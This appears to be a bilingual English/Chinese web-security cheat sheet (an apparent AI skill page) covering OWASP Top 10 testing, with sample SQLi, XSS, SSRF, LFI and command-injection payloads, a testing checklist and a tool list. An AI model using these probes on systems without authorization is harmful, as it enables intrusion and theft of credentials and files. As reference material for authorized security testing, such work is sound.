web-security-expert

Compare original and translation side by side

🇺🇸

Original

English
🇨🇳

Translation

Chinese

Web Security Expert

Web安全专家

OWASP Top 10 Quick Reference

OWASP Top 10快速参考

VulnTestPayload Example
SQLi
'
,
"
,
1 OR 1=1
' UNION SELECT null,username,password FROM users--
XSS
<script>
, event handlers
<img src=x onerror=alert(1)>
SSRFInternal URLs
http://127.0.0.1
,
http://169.254.169.254
IDORChange IDs
/api/user/123
/api/user/124
LFIPath traversal
../../../etc/passwd
RCECommand chars
; id
, `
漏洞测试方法Payload示例
SQLi
'
,
"
,
1 OR 1=1
' UNION SELECT null,username,password FROM users--
XSS
<script>
、事件处理器
<img src=x onerror=alert(1)>
SSRF内部URL
http://127.0.0.1
,
http://169.254.169.254
IDOR修改ID
/api/user/123
/api/user/124
LFI路径遍历
../../../etc/passwd
RCE命令字符
; id
, `

Testing Checklist

测试清单

Authentication

身份验证

  • Brute force protection
  • Password reset flaws
  • Session fixation
  • JWT vulnerabilities
  • 暴力破解防护
  • 密码重置漏洞
  • 会话固定
  • JWT漏洞

Authorization

授权

  • IDOR on all endpoints
  • Privilege escalation
  • Missing function level access
  • 所有端点的IDOR
  • 权限提升
  • 缺失功能级访问控制

Input Validation

输入验证

  • SQLi all parameters
  • XSS reflected/stored
  • Command injection
  • File upload bypass
  • 所有参数的SQLi测试
  • 反射型/存储型XSS
  • 命令注入
  • 文件上传绕过

Quick Payloads

快速Payload

undefined
undefined

SQLi

SQLi

' OR '1'='1 ' UNION SELECT null,null,null-- '; WAITFOR DELAY '0:0:5'--
' OR '1'='1 ' UNION SELECT null,null,null-- '; WAITFOR DELAY '0:0:5'--

XSS

XSS

<script>alert(document.domain)</script> <img src=x onerror=alert(1)> javascript:alert(1)
<script>alert(document.domain)</script> <img src=x onerror=alert(1)> javascript:alert(1)

SSRF

SSRF

LFI

LFI

....//....//....//etc/passwd ..%252f..%252f..%252fetc/passwd
undefined
....//....//....//etc/passwd ..%252f..%252f..%252fetc/passwd
undefined

Tools

工具

PurposeTool
ProxyBurp Suite, OWASP ZAP
SQLisqlmap
XSSXSStrike, dalfox
Fuzzingffuf, wfuzz
用途工具
代理Burp Suite, OWASP ZAP
SQLi测试sqlmap
XSS测试XSStrike, dalfox
模糊测试ffuf, wfuzz